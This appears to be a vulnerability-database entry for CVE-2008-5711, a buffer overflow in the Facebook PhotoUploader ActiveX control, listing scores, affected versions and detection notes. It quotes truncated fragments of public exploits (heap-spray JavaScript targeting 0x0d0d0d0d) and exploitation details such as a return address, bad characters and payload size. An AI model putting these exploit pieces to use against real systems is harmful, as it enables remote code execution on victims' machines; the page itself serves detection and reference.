CVE-2008-5711
Published 2008-12-24
Priority: P3 · 53 · critical
CVSS 2.0: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 32.70% (98.1th percentile)
Heap-based buffer overflow in the Facebook PhotoUploader ActiveX control 5.0.14.0 and earlier allows remote attackers to execute arbitrary code via a long FileMask property value.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| | photouploader | <= 5.0.14.0 | — |
| | photouploader | — | — |
Detection & IOCs
- bytes: %u0D0D%u0D0D%u9090%u9090
- bytes: 0x969606eb
- Detect heap spray targeting address 0x0d0d0d0d via repeated %u0D0D%u0D0D unescape patterns in browser JavaScript, indicative of exploitation of the Facebook PhotoUploader ActiveX control.
- Monitor for instantiation of the ImageUploader4.ocx ActiveX control in Internet Explorer, particularly invocations of the ExtractIptc() method or setting of the FileMask property with long strings.
- The Metasploit module uses oleacc.dll SEH handler at 0x74c9de3e as the return address on IE 6 SP0-SP2 / Windows XP SP2; look for ROP/SEH overwrites targeting this address.
- Payload bad characters for this exploit are null byte, tab, newline, carriage return, single quote, and backslash; payloads avoiding these characters in ActiveX property values should be treated as suspicious.
- The Metasploit module targets only IE 6 SP0-SP2 on Windows XP SP2 Pro English; the hardcoded return address (0x74c9de3e from oleacc.dll) is version-specific and will not work on other OS/browser combinations.
- The NVD description references the FileMask property as the overflow vector for version 5.0.14.0, while the Metasploit module and exploit-db PoC target the ExtractIptc() method in ImageUploader4.ocx 4.5.57.0; these are distinct attack vectors across two different control versions.
- The exploit payload space is limited to 800 bytes with a stack adjustment of -3500, constraining the size and type of shellcode that can be delivered.
No detection rules found.
Exploit-DB
Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
---
##
# $Id: facebook_extractiptc.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Facebook Photo Uploader 4.
By sending an overly long string to the "ExtractIptc()" property located
in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow
exploitdb·2008-02-12
---
var shellcode = unescape("%u0D0D%u0D0D%u9090%u9090"+ //Windows Execute Command (calc)
var address = 0x0d0d0d0d;
var block_size = 0x400000;
var blocks = (address - block_size) / block_size;
var spray = unescape("%u0D0D%u0D0D");
var tmp = unescape("%u0D0D%u0D0D");
var tmp_size = 1044;
while((spray.l
Exploit-DB
FaceBook PhotoUploader - 'ImageUploader4.ocx 4.5.57.0' Remote Buffer Overflow
exploitdb·2008-02-03
---
FaceBook PhotoUploader Buffer Overflow Exploit
function Check() {
var buf = unescape("%u4141");
while (buf.length
Unable to create object
# milw0rm.com [2008-02-03]
Metasploit
Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
metasploit
This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the "ExtractIptc()" property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.